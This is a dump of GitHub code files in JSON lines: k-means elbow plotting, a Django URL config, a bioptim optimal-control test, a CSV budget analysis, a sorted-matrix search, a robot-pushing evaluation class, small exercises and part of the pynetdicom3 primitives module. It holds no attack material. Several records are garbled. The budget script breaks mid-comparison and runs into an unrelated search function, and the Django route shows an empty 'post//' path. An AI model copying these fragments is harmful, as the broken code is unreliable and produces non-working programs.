+{"seq_id":"70330457928","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.spatial.distance import cdist, pdist\nfrom sklearn.cluster import KMeans\n\n# CHARACTER_DATA_FILE = './spambase.data'\n# char_data = pd.read_csv(CHARACTER_DATA_FILE)\n# char_x = char_data[[x for x in char_data.columns if x != \"spam\"]]\n\nraw_data = pd.read_csv('spambase.data', sep = ',', header=None) # 4601 instances\nchar_x = raw_data.drop([57], axis=1)\n# labels = raw_data[[57]]\n# train_data, test_data, train_label, test_label = train_test_split(data, labels, test_size=0.2) # 3680 + 921 instances\n\n# WINE_DATA_FILE = './satellite.data'\n# wine_data = pd.read_csv(WINE_DATA_FILE)\n# wine_x = wine_data[[x for x in wine_data.columns if x != \"quality\"]]\nraw_data = pd.read_csv('satellite.data', sep = ' ', header=None) # 6435 instances\nwine_x = raw_data.drop([36], axis=1)\n# labels = raw_data[[36]]\n# train_data, test_data, train_label, test_label = train_test_split(data, labels, test_size=0.2) # 5148 + 1287 instances\n\n\n\n\n\n\n\n# Train kmean models, once for each value of k (aka create k clusters ea time)\nK = range(1, 40)\nKM_c = [KMeans(n_clusters=k).fit(char_x) for k in K]\nKM_w = [KMeans(n_clusters=k).fit(wine_x) for k in K]\nprint(\"Trained kmean models\")\n\n# For ea val of k, find centroids of ea of their clusters\ncentroids_c = [km.cluster_centers_ for km in KM_c]\ncentroids_w = [km.cluster_centers_ for km in KM_w]\nprint(\"Found the centroids\")\n\n# Calc euclid dist from data pt to center of cluster it belongs to\nDk_c = [cdist(char_x, center, 'euclidean') for center in centroids_c]\nDk_w = [cdist(wine_x, center, 'euclidean') for center in centroids_w]\nprint(\"Calculated euclidean distance\")\n\ncIdx_c = [np.argmin(D, axis=1) for D in Dk_c]\ndist_c = [np.min(D, axis=1) for D in Dk_c]\navgWithinSS_c = [sum(d) / char_x.shape[0] for d in dist_c]\n\n# Total with-in sum of square\nwcss_c = [sum(d**2) for d in dist_c]\ntss_c = sum(pdist(char_x)**2) / char_x.shape[0]\nbss_c = tss_c - wcss_c\ncIdx_w = [np.argmin(D, axis=1) for D in Dk_w]\ndist_w = [np.min(D, axis=1) for D in Dk_w]\navgWithinSS_w = [sum(d) / char_x.shape[0] for d in dist_w]\n\n# Total with-in sum of square\nwcss_w = [sum(d**2) for d in dist_w]\ntss_w = sum(pdist(char_x)**2) / char_x.shape[0]\nbss_w = tss_w - wcss_w\nprint(\"Calculated sum of square errors\")\nkIdx_c = 9\nkIdx_w = 4\nplt.style.use('ggplot')\n\n# elbow curve\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, avgWithinSS_c, '*-', label='Spambase')\nax.plot(K[kIdx_c], avgWithinSS_c[kIdx_c], marker='o', markersize=12,\n markeredgewidth=2, markeredgecolor='r', markerfacecolor='None')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Average within-cluster sum of squares')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow1.png')\nplt.show()\n\n# elbow curve\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, avgWithinSS_w, '*-', label='Satellite')\nax.plot(K[kIdx_w], avgWithinSS_w[kIdx_w], marker='o', markersize=12,\n markeredgewidth=2, markeredgecolor='b', markerfacecolor='None')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Average within-cluster sum of squares')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow2.png')\nplt.show()\n\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, bss_c / tss_c * 100, '*-', 
label='Spambase')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Percentage of variance explained')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow3.png')\nplt.show()\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, bss_w / tss_w * 100, '*-', label='Satellite')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Percentage of variance explained')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow4.png')\nplt.show()","repo_name":"jpan68/ML-datasets","sub_path":"HW3 - Unsupervised Learning & Dimensionality Reduction/clustering_kmeans.py","file_name":"clustering_kmeans.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
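A minimal sketch (X is an assumed feature matrix, e.g. either dataset loaded above): KMeans already exposes the within-cluster sum of squares as inertia_, which yields the same elbow curve the script assembles by hand with cdist and argmin.

import matplotlib.pyplot as plt
from sklearn.cluster import KMeans

ks = range(1, 40)
wcss = [KMeans(n_clusters=k, n_init=10).fit(X).inertia_ for k in ks]   # X: assumed feature matrix

plt.plot(ks, wcss, "*-")
plt.xlabel("Number of clusters")
plt.ylabel("Within-cluster sum of squares")
plt.title("Elbow for KMeans clustering")
plt.show()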
+{"seq_id":"71227335048","text":"from django.urls import path\nfrom blogapp import views # импортируем вьюшки\n\n\napp_name = 'blogapp'\n\nurlpatterns = [\n path('', views.main_view, name='index'),\n path('create/', views.create_post, name='create'),\n path('post//', views.post, name='post')\n]\n","repo_name":"DmitriChe/django-blog20_orm","sub_path":"blog/blogapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2598405509","text":"\"\"\"\nTest for file IO\n\"\"\"\nimport os\n\nfrom bioptim import PhaseDynamics\nimport numpy as np\nimport pytest\n\n\n@pytest.mark.parametrize(\"phase_dynamics\", [PhaseDynamics.SHARED_DURING_THE_PHASE, PhaseDynamics.ONE_PER_NODE])\ndef test_double_pendulum_torque_driven_IOCP(phase_dynamics):\n # Load double pendulum ocp\n from bioptim.examples.inverse_optimal_control import double_pendulum_torque_driven_IOCP as ocp_module\n\n bioptim_folder = os.path.dirname(ocp_module.__file__)\n biorbd_model_path = bioptim_folder + \"/models/double_pendulum.bioMod\"\n\n ocp = ocp_module.prepare_ocp(\n weights=[0.4, 0.3, 0.3],\n coefficients=[1, 1, 1],\n biorbd_model_path=biorbd_model_path,\n phase_dynamics=phase_dynamics,\n n_threads=4 if phase_dynamics == PhaseDynamics.SHARED_DURING_THE_PHASE else 1,\n expand_dynamics=True,\n )\n\n sol = ocp.solve()\n\n # Check constraints\n g = np.array(sol.constraints)\n\n # Check some of the results\n states, controls = sol.states, sol.controls\n q, qdot, tau = states[\"q\"], states[\"qdot\"], controls[\"tau\"]\n\n np.testing.assert_equal(g.shape, (120, 1))\n np.testing.assert_almost_equal(g, np.zeros((120, 1)))\n\n # Check objective function value\n f = np.array(sol.cost)\n np.testing.assert_equal(f.shape, (1, 1))\n np.testing.assert_almost_equal(f[0, 0], 13.03787939)\n\n # initial and final position\n np.testing.assert_almost_equal(q[:, 0], np.array([-3.14159265, 0.0]))\n np.testing.assert_almost_equal(q[:, -1], np.array([3.14159265, 0.0]))\n\n # initial and final velocities\n np.testing.assert_almost_equal(qdot[:, 0], np.array([-3.32315017, 15.70796327]))\n np.testing.assert_almost_equal(qdot[:, -1], np.array([3.0362723, -2.87576071]))\n\n # initial and final controls\n np.testing.assert_almost_equal(tau[:, 0], np.array([-11.49023683]))\n np.testing.assert_almost_equal(tau[:, -2], np.array([0.04617407]))\n","repo_name":"pyomeca/bioptim","sub_path":"tests/shard2/test_global_inverse_optimal_control.py","file_name":"test_global_inverse_optimal_control.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"16"}
+{"seq_id":"34762652298","text":"# Dependencies\r\nimport csv \r\n#csv read\r\nwith open ('budget_data.csv') as csvfile: \r\n\r\n csvreader=csv.reader(csvfile, delimiter=',') \r\n header=next(csvreader) \r\n\r\n #Variables and Conditions\r\n months=[] \r\n prolosses=[] \r\n\r\n \r\n total=0\r\n a_change=0\r\n m_change=0\r\n m_count=0\r\n delta1=0\r\n delta2=0\r\n delta_line1=0\r\n delta_line2=0\r\n loop1=0\r\n loop2=0\r\n\r\n #Read\r\n for row in csvreader:\r\n month=row[0] \r\n proloss=row[1] \r\n months.append(month) \r\n prolosses.append(proloss) \r\n \r\n m_count = len(months) \r\n\r\n\r\n#analysis\r\n\r\n#loop1\r\nfor loop1 in range (m_count):\r\n total=total+int(prolosses[loop1]) \r\n\r\n#loop2 (calculation)\r\nfor loop2 in range (m_count-1): #Restrict loop to avoid overflow (last line +1)\r\n a_change=a_change+(float(prolosses[loop2+1])-float(prolosses[loop2])) \r\n\r\n m_change=(float(prolosses[loop2+1])-float(prolosses[loop2])) \r\n if m_change>delta1: \r\n delta1=m_change\r\n delta_line1=loop2\r\n else:\r\n delta1=delta1\r\n\r\n if m_change key:\n j -= 1\n else:\n i += 1\n return -1\n\n\narray = [\n [10, 20, 30, 40],\n [15, 25, 35, 45],\n [27, 29, 37, 48],\n [32, 33, 39, 52]\n]\n\nprint(search(array, 52))","repo_name":"pulkitmunjral/DSA_python","sub_path":"Other/searchin2dSortedarray.py","file_name":"searchin2dSortedarray.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"40959661603","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport random\nimport glob\nimport sys, os\nimport math\nimport pybullet_data\nimport scipy.misc\nfrom skimage.draw import line, polygon\nfrom custom_utils import load_model, TURTLEBOT_URDF, joints_from_names, \\\n set_joint_positions, HideOutput, get_bodies, sample_placement, pairwise_collision, \\\n set_point, Point, create_box, stable_z, TAN, GREY, connect, PI, OrderedSet, \\\n wait_if_gui, dump_body, set_all_color, BLUE, child_link_from_joint, link_from_name, draw_pose, Pose, pose_from_pose2d, \\\n get_random_seed, get_numpy_seed, set_random_seed, set_numpy_seed, plan_joint_motion, plan_nonholonomic_motion, \\\n joint_from_name, safe_zip, draw_base_limits, BodySaver, WorldSaver, LockRenderer, elapsed_time, disconnect, flatten, \\\n INF, wait_for_duration, get_unbuffered_aabb, draw_aabb, DEFAULT_AABB_BUFFER, get_link_pose, get_joint_positions, \\\n get_subtree_aabb, get_pairs, get_distance_fn, get_aabb, set_all_static, step_simulation, get_bodies_in_region, \\\n AABB, update_scene, Profiler, pairwise_link_collision, BASE_LINK, get_collision_data, draw_pose2d, \\\n normalize_interval, wrap_angle, CIRCULAR_LIMITS, wrap_interval, Euler, rescale_interval, adjust_path, WHITE, RED, \\\n sample_pos_in_env, remove_body, get_euler, get_point, get_config, reset_sim, set_pose, get_quat,euler_from_quat, \\\n quat_from_euler, pixel_from_point, create_cylinder, create_capsule, create_sphere\nclass Eval:\n def __init__(self, sim, utils):\n self.sim = sim\n self.utils = utils\n self.success_list = []\n self.reward_list = []\n self.run_length_list = []\n self.path_length_list = []\n self.current_path_length = 0\n self.current_path = []\n self.current_initial_image = None\n self.global_count = 0\n\n def evaluation_reset(self):\n which_obstacle = self.sim.evaluation_sample[\"obstacle_scenario_id\"]\n self.utils.choose_obstacle_build(which_obstacle)\n self.utils.reset_obj_fix(self.sim.pushing_object_id, self.sim.evaluation_sample[\"start\"])\n self.sim.step_simulation(self.sim.per_step_iterations)\n self.sim.current_obj_conf = get_config(self.sim.pushing_object_id, self.sim._p, self.sim.client_id)\n self.sim.last_obj_conf = self.sim.current_obj_conf\n self.sim.goal_obj_conf = self.sim.evaluation_sample['goal']\n arm_pose = self.sim.evaluation_sample['gripper']\n _, self.sim.current_depth_img, self.sim.current_true_depth = self.utils.get_image()\n self.sim.initial_true_depth = self.sim.current_true_depth\n self.sim.initial_image_processed = self.utils.process_initial_image(self.sim.current_depth_img, self.sim.current_obj_conf)\n target_joint_states = self.sim.get_ik_joints(arm_pose[0], euler_from_quat(arm_pose[1]),\n self.sim._robot_tool_center)[:6]\n self.sim._reset_arm_fixed(target_joint_states)\n\n def write_evaluation_RL(self, Done, reward):\n if Done:\n if self.sim.target_reached:\n self.success_list.append(True)\n else: self.success_list.append(False)\n self.reward_list.append(reward)\n self.run_length_list.append(self.sim.current_steps)\n self.sim.contact_frames.append(self.sim.has_contact)\n if self.sim.save_evaluations:\n os.makedirs(self.sim.evaluation_save_path, exist_ok=True)\n self.utils.save_np(np.asarray(self.success_list), self.sim.evaluation_save_path + \"success_list.npy\")\n self.utils.save_np(np.asarray(self.reward_list), self.sim.evaluation_save_path + \"reward_list.npy\")\n self.utils.save_np(np.asarray(self.run_length_list), self.sim.evaluation_save_path + \"run_length_list.npy\")\n 
self.utils.save_np(np.asarray(self.sim.contact_frames), self.sim.evaluation_save_path + \"contact_frames.npy\")\n\n def straight_pushing_eval_RL(self, Done, current_pose, last_pose, img):\n pos_distance = np.linalg.norm(last_pose - current_pose)\n self.current_path_length += pos_distance\n self.current_path.append([current_pose, last_pose])\n if Done:\n self.path_length_list.append(self.current_path_length)\n self.straight_pushing_picture_RL(img)\n self.current_path_length = 0\n self.current_path.clear()\n self.global_count+=1\n\n def straight_pushing_picture_RL(self, img):\n img = self.sim.initial_path_img.copy()\n black_pixels_mask = np.all(img == [0, 0, 0], axis=-1)\n img[black_pixels_mask] = [255, 255, 255]\n for p in self.current_path:\n p_1 = self.utils.get_pos_in_image(p[0])\n p_2 = self.utils.get_pos_in_image(p[1])\n img = cv2.line(img, (p_1[0], p_1[1]), (p_2[0], p_2[1]), [255,0,0], 2)\n cv2.imwrite(self.evaluation_save_path + \"path_img_\" + str(self.global_count) + \".png\", img)\n\n def write_evaluation_baseline(self, reached):\n if reached: self.success_list.append(True)\n else: self.success_list.append(False)\n if self.sim.save_evaluations:\n os.makedirs(self.sim.evaluation_save_path, exist_ok=True)\n self.utils.save_np(np.asarray(self.success_list), self.sim.evaluation_save_path + \"success_list.npy\")\n self.utils.save_np(np.asarray(self.current_path_length), self.sim.evaluation_save_path + \"real_path_length_list.npy\")\n self.utils.save_np(np.asarray(self.reward_list), self.sim.evaluation_save_path + \"reward_list.npy\")\n self.utils.save_np(np.asarray(self.run_length_list), self.sim.evaluation_save_path + \"run_length_list.npy\")\n self.utils.save_np(np.asarray(self.sim.contact_frames), self.sim.evaluation_save_path + \"contact_frames.npy\")\n\n\n def straight_pushing_eval_baseline(self, Done, current_pose, last_pose):\n pos_distance = np.linalg.norm(last_pose - current_pose)\n self.current_path_length += pos_distance\n self.current_path.append([current_pose, last_pose])\n if Done:\n self.path_length_list.append(self.current_path_length)\n # self.astar_deviation()\n self.straight_pushing_picture_baseline()\n self.current_path_length = 0\n self.current_path.clear()\n self.global_count+=1\n\n def astar_deviation(self, plot=False):\n #get trajectory in grid coords\n trajectory = []\n for points in self.current_path:\n point = self.temp((points[0] + points[1])/2)\n trajectory.append(point)\n trajectory = np.flip(np.array(trajectory, dtype=int), axis=1)\n\n #cut astar path when target is in reach\n goal = np.flip(self.temp(self.sim.goal_obj_conf[0]))\n distances = np.sqrt(np.square(goal[0] - self.sim.baseline.path[:, 0]) + np.square(goal[1] - self.sim.baseline.path[:, 1]))\n till = np.min(np.argwhere(distances < self.sim.baseline.target_reached_thres*256))\n path = self.sim.baseline.path[0:max(till, 1)]\n\n #connect edges\n edges = np.concatenate((trajectory, path))\n finish = np.transpose(np.array(line(path[-1, 0], path[-1, 1], trajectory[-1, 0], trajectory[-1, 1])))\n start = np.transpose(np.array(line(path[0, 0], path[0, 1], trajectory[0, 0], trajectory[0, 1])))\n edges = np.concatenate((edges, finish))\n edges = np.concatenate((start, edges))\n\n #fill space between edges\n fill = polygon(edges[:, 0], edges[:, 1])\n # num_fill = len(fill[0]) - len(np.unique(edges, axis=1))\n num_fill = len(fill[0])\n self.path_deviation = num_fill/(np.power(2., 16.)*np.power(10., -4.)) #in square centimeters\n print(\"number of cells: \", num_fill)\n print(\"space: {} 
cm^2\".format(self.path_deviation))\n\n #plot\n if plot:\n base = np.zeros((256, 256))\n base[fill] = 1\n plt.imsave(self.sim.evaluation_save_path + \"fill\"+ str(self.global_count) + \".png\", base)\n\n def theta_star_deviation(self, plot=False):\n path = self.sim.initial_shortest_path\n #get trajectory in grid coords\n trajectory = []\n for points in self.current_path:\n point = self.temp((points[0] + points[1])/2)\n trajectory.append(point)\n trajectory = np.flip(np.array(trajectory, dtype=int), axis=1) #???\n\n #connect edges\n edges = np.concatenate((trajectory, path))\n finish = np.transpose(np.array(line(path[-1, 0], path[-1, 1], trajectory[-1, 0], trajectory[-1, 1])))\n start = np.transpose(np.array(line(path[0, 0], path[0, 1], trajectory[0, 0], trajectory[0, 1])))\n edges = np.concatenate((edges, finish))\n edges = np.concatenate((start, edges))\n\n #fill space between edges\n fill = polygon(edges[:, 0], edges[:, 1])\n # num_fill = len(fill[0]) - len(np.unique(edges, axis=1))\n num_fill = len(fill[0])\n print(\"number of cells: \", num_fill)\n\n #plot\n if plot:\n base = np.zeros((256, 256))\n base[fill] = 1\n plt.imsave(self.sim.evaluation_save_path + \"fill\"+ str(self.global_count) + \".png\", base)\n\n def temp(self,coords):\n pos = np.asarray([0, 0], dtype=int)\n # pos[1] = int((coords[0] + 0.5) * 256 / 1) # int((coords[0] + 0.45)*255/0.9) #\n # pos[0] = int((coords[1] + 0.9) * 256 / 1) # int((coords[1] + 0.75)*127/0.45)#\n # pos[0] = int((coords[0] + 0.5)*(self.workspace_size[0] - 1)/1) #int((coords[0] + 0.45)*255/0.9) #\n pos[0] = int((coords[0] + 0.907/2)*(256 - 1)/0.907) #int((coords[0] + 0.45)*255/0.9) #\n # pos[1] = int((coords[1] + 0.9)*(self.workspace_size[1] - 1)/1) #int((coords[1] + 0.75)*127/0.45)#\n pos[1] = int((coords[1] + 0.903)*(256 - 1)/0.903) #int((coords[1] + 0.75)*127/0.45)#\n return pos\n\n def rev_temp(self, coords):\n pos = np.asarray([0,0], dtype=float)\n # pos[0] = (1/2)*(1.2/256) + coords[0]/256*1 - 0.5\n # pos[1] = (1/2)*(1/256) + coords[1]/256*1 - 0.9\n # pos[0] = (1/2)*(1.2/self.workspace_size[0]) + coords[0]/self.workspace_size[0]*1 - 0.5\n pos[0] = (1/2)*(1/256) + coords[0]/256*1 - 0.907/2\n # pos[1] = (1/2)*(1/self.workspace_size[1]) + coords[1]/self.workspace_size[1]*1 - 0.9\n pos[1] = (1/2)*(1/256) + coords[1]/256*1 - 0.903\n return pos\n\n def straight_pushing_picture_baseline(self):\n img = self.sim.baseline.initial_path_img.copy()\n for p in self.current_path:\n p_1 = self.temp(p[0])#self.utils.get_pos_in_image(np.append(p[0], [0.025]))\n p_2 = self.temp(p[1])#self.utils.get_pos_in_image(np.append(p[1], [0.025]))\n img = cv2.line(img, (p_2[0], p_2[1]), (p_1[0], p_1[1]), [255,0,255], 2)\n cv2.imwrite(self.sim.evaluation_save_path + \"path_img_\"+ str(self.global_count) + \".png\", img)\n\n","repo_name":"btabia/residual-pushing","sub_path":"push_gym/push_gym/evaluation/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36213041028","text":"import time\r\n\r\nnome = None\r\n\r\ndef bemVindo():\r\n global nome\r\n nome = input('Insira seu nome: ')\r\n\r\n confirm = input('Isso está correto? \"{}\" S/N >'.format(nome)).lower()\r\n\r\n if confirm == 's':\r\n nome = nome\r\n else:\r\n bemVindo()\r\n\r\nbemVindo()\r\n\r\ntime.sleep(1)\r\nprint('Bem vindo, ',nome)\r\n\r\n\r\n\r\n\r\n","repo_name":"S4Yuuki/Curso.py","sub_path":"Atividades/002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"74952360328","text":"import sys\n\n# read file\ndata = sys.stdin.readlines()\n\n# clean\nclean_data = [[int(i.strip()) for i in line.strip()] for line in data]\n\ndata = clean_data\n\n# process\ngamma, epsilon = [], []\nones, zeros = 0, 0\n\nfor i in range(len(data[0])):\n for j in data:\n if j[i] == 0:\n zeros += 1\n else:\n ones += 1\n\n if zeros > ones:\n gamma.append(\"0\")\n epsilon.append(\"1\")\n\n else:\n gamma.append(\"1\")\n epsilon.append(\"0\")\n\n zeros, ones = 0, 0\n\n\ngamma = int(\"\".join(gamma), base=2)\nepsilon = int(\"\".join(epsilon), base=2)\n\nprint(gamma * epsilon)\n","repo_name":"gotche/advent_of_code","sub_path":"03/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8213600371","text":"\"\"\"\nImplementaion of the service parameter primitives.\n\"\"\"\nimport codecs\nimport logging\n\nfrom pydicom.uid import UID\n\nfrom pynetdicom3.pdu import (MaximumLengthSubItem,\n ImplementationClassUIDSubItem,\n ImplementationVersionNameSubItem,\n AsynchronousOperationsWindowSubItem,\n SCP_SCU_RoleSelectionSubItem,\n SOPClassExtendedNegotiationSubItem,\n SOPClassCommonExtendedNegotiationSubItem,\n UserIdentitySubItemRQ,\n UserIdentitySubItemAC)\nfrom pynetdicom3.utils import validate_ae_title, PresentationContext\n#from pynetdicom3.utils import pretty_bytes\n\nLOGGER = logging.getLogger('pynetdicom3.pdu_primitives')\n\n\nclass ServiceParameter(object):\n \"\"\" Base class for Service Parameters \"\"\"\n\n def __eq__(self, other):\n \"\"\"Equality of two ServiceParameters\"\"\"\n if isinstance(other, self.__class__):\n return other.__dict__ == self.__dict__\n\n return False\n\n def __ne__(self, other):\n \"\"\"Inequality of two ServiceParameters\"\"\"\n return not self == other\n\n def from_primitive(self):\n \"\"\"FIXME\"\"\"\n raise NotImplementedError\n\n def FromParams(self):\n \"\"\"FIXME\"\"\"\n return self.from_primitive()\n\n\n# Association Service primitives\nclass A_ASSOCIATE(object):\n \"\"\"\n A-ASSOCIATE Parameters\n\n The establishment of an association between two AEs shall be performed\n through ACSE A-ASSOCIATE request, indication, response and confirmation\n primitives.\n\n The initiator of the service is called the Requestor and the user that\n receives the request is the Acceptor.\n\n See PS3.8 Section 7.1.1\n\n The A-ASSOCIATE primitive is used by the DUL provider to send/receive\n information about the association. It gets converted to \n A-ASSOCIATE-RQ, -AC, -RJ PDUs that are sent to the peer DUL provider and \n gets deconverted from -RQ, -AC, -RJ PDUs received from the peer.\n\n It may be better to simply extend this with methods for containing\n the -rq, -ac, -rj possibilities rather than creating a new\n AssociationInformation class, but it would require maintaining the instance\n across the request-accept/reject path\n\n -rq = no Result value\n -ac = Result of 0x00\n -rj = Result != 0x00\n\n ::\n\n Parameter Request Indication Response Confirmation\n app context name M M(=) M M(=)\n calling ae title M M(=) M M(=)\n called ae title M M(=) M M(=)\n user info M M(=) M M(=)\n result M M(=)\n source M\n diagnostic U C(=)\n calling pres add M M(=)\n called pres add M M(=)\n pres context list M M(=)\n pres list result M M(=)\n\n mode UF MF(=)\n resp ae title MF MF(=)\n resp pres add MF MF(=)\n pres and sess req UF UF(=) UF UF(=)\n\n U - User option\n UF - User option, fixed value\n C - Conditional (on user option)\n M - Mandatory\n MF - Mandatory, fixed value\n (=) - shall have same value as request or response\n\n\n The Requestor sends a request primitive to the local DICOM UL provider =>\n peer UL => indication primitive to Acceptor.\n\n Acceptor sends response primitive to peer UL => local UL => confirmation\n primitive to Requestor\n\n The DICOM UL providers communicate with UL users using service primitives\n The DICOM UL providers communicate with each other using PDUs over TCP/IP\n\n **Service Procedure**\n\n 1. An AE (DICOM UL service user) that desires the establish an association\n issues an A-ASSOCIATE request primitive to the DICOM UL service\n provider. The Requestor shall not issue any primitives except the\n A-ABORT request primitive until it receives an A-ASSOCIATE confirmation\n primitive.\n 2. 
The DICOM UL service provider issues an A-ASSOCIATE indication primitive\n to the called AE\n 3. The called AE shall accept or reject the association by sending an\n A-ASSOCIATE response primitive with an appropriate Result parameter. The\n DICOM UL service provider shall issue an A-ASSOCIATE confirmation\n primitive having the same Result parameter. The Result Source parameter\n shall be assigned \"UL service-user\"\n 4. If the Acceptor accepts the association, it is established and is\n available for use. DIMSE messages can now be exchanged.\n 5. If the Acceptor rejects the association, it shall not be established and\n is not available for use\n 6. If the DICOM UL service provider is not capable of supporting the\n requested association it shall return an A-ASSOCIATE confirmation\n primitive to the Requestor with an appropriate Result parameter\n (rejected). The Result Source parameter shall be assigned either\n UL service provider (ACSE) or UL service provider (Presentation).\n The indication primitive shall not be issued. The association shall not\n be established.\n 7. Either Requestor or Acceptor may disrupt the Service Procedure by issuing\n an A-ABORT request primitive. The remote AE receives an A-ABORT\n indication primitive. The association shall not be established\n\n Attributes\n ----------\n mode : str\n Fixed value of \"normal\"\n PS3.8 7.1.1.1, [UF, MF(=), -, -]\n application_context_name : pydicom.uid.UID, bytes or str\n The application context name proposed by the requestor. Acceptor returns\n either the same or a different name. Returned name specifies the\n application context used for the Association. See PS3.8 Annex A. The\n application context name shall be a valid UID or UID string and for\n version 3 of the DICOM Standard should be '1.2.840.10008.3.1.1.1'\n PS3.8 7.1.1.2, [M, M(=), M, M(=)]\n calling_ae_title : str or bytes\n Identifies the Requestor of the A-ASSOCIATE service. Must be a valid\n AE\n PS3.8 7.1.1.3, [M, M(=), M, M(=)]\n called_ae_title : str or bytes\n Identifies the intended Acceptor of the A-ASSOCIATE service. Must be a\n valid AE\n PS3.8 7.1.1.4, [M, M(=), M, M(=)]\n responding_ae_title : str or bytes\n Identifies the AE that contains the actual acceptor of the\n A-ASSOCIATE service. Shall always contain the same value as the\n Called AE Title of the A-ASSOCIATE indication\n PS3.8 7.1.1.5, [-, -, MF, MF(=)]\n user_information : list\n Used by Requestor and Acceptor to include AE user information. See\n PS3.8 Annex D and PS3.7 Annex D.3\n PS3.8 7.1.1.6, [M, M(=), M, M(=)]\n result : int\n Provided either by the Acceptor of the A-ASSOCIATE request, the UL\n service provider (ACSE related) or the UL service provider\n (Presentation related). Indicates the result of the A-ASSOCIATE\n service. 
Allowed values are:\n\n * 0: accepted\n * 1: rejected (permanent)\n * 2: rejected (transient)\n\n PS3.8 7.1.1.7, [-, -, M, M(=)]\n result_source : int\n Identifies the creating source of the Result and Diagnostic parameters\n Allowed values are:\n\n * 0: UL service-user\n * 1: UL service-provider (ACSE related function)\n * 2: UL service-provider (presentation related function)\n\n PS3.8 7.1.1.8, [-, -, -, M]\n diagnostic : int\n If the `result` parameter is 0 \"rejected (permanent)\" or 1 \"rejected\n (transient)\" then this supplies diagnostic information about the result.\n If `result_source` is 0 \"UL service-user\" then allowed values are:\n\n * 0: no reason given\n * 1: application context name not supported\n * 2: calling AE title not recognised\n * 3: called AE title not recognised\n\n If `result_source` is 1 \"UL service-provider (ACSE related function)\"\n then allowed values are:\n\n * 0: no reason given\n * 1: no common UL version\n\n If `result_source` is 2 \"UL service-provider (presentation related\n function)\" then allowed values are:\n\n * 0: no reason given\n * 1: temporary congestion\n * 2: local limit exceeded\n * 3: called presentation address unknown\n * 4: presentation protocol version not supported\n * 5: no presentation service access point available\n \n PS3.8 7.1.1.9, [-, -, U, C(=)]\n calling_presentation_address : str\n TCP/IP address of the Requestor\n PS3.8 7.1.1.10, [M, M(=), -, -]\n called_presentation_address : str\n TCP/IP address of the intended Acceptor\n PS3.8 7.1.1.11, [M, M(=), -, -]\n responding_presentation_address : str\n Shall always contain the same value as the Called Presentation Address\n PS3.8 7.1.1.12, [-, -, MF, MF(=)]\n presentation_context_definition_list : list\n List of one or more presentation contexts, with each item containing\n a presentation context ID, an Abstract Syntax and a list of one or\n more Transfer Syntax Names. 
Sent by the Requestor during\n request/indication\n PS3.8 7.1.1.13, [M, M(=), -, -]\n presentation_context_definition_results_list : list\n Used in response/confirmation to indicate acceptance or rejection of\n each presentation context definition.\n List of result values, with a one-to-one correspondence between each\n of the presentation contexts proposed in the Presentation Context\n Definition List parameter.\n The result values may be sent in any order and may be different than\n the order proposed.\n Only one Transfer Syntax per presentation context shall be agreed to\n PS3.8 7.1.1.14, [-, -, M, M(=)]\n presentation_requirements : str\n Fixed value of \"Presentation Kernel\"\n PS3.8 7.1.1.15, [UF, UF(=), UF, UF(=)]\n session_requirements : str\n Fixed value of \"\" (empty string)\n PS3.8 7.1.1.16, [UF, UF(=), UF, UF(=)]\n \"\"\"\n # pylint: disable=too-many-instance-attributes\n\n def __init__(self):\n self.application_context_name = None\n self.calling_ae_title = None\n self.called_ae_title = None\n self.user_information = []\n self.result = None\n self.result_source = None\n self.diagnostic = None\n self.calling_presentation_address = None\n self.called_presentation_address = None\n self.presentation_context_definition_list = []\n self.presentation_context_definition_results_list = []\n\n @property\n def mode(self):\n \"\"\"Return the Mode parameter.\"\"\"\n return \"normal\"\n\n @property\n def application_context_name(self):\n \"\"\"Return the Application Context Name parameter.\"\"\"\n return self._application_context_name\n\n @application_context_name.setter\n def application_context_name(self, value):\n \"\"\"Set the Application Context Name parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Application Context Name\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n raise TypeError(\"application_context_name must be a \"\n \"pydicom.uid.UID, str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"application_context_name is an invalid UID\")\n raise ValueError(\"application_context_name is an invalid UID\")\n\n self._application_context_name = value\n\n @property\n def calling_ae_title(self):\n \"\"\"Return the Calling AE Title 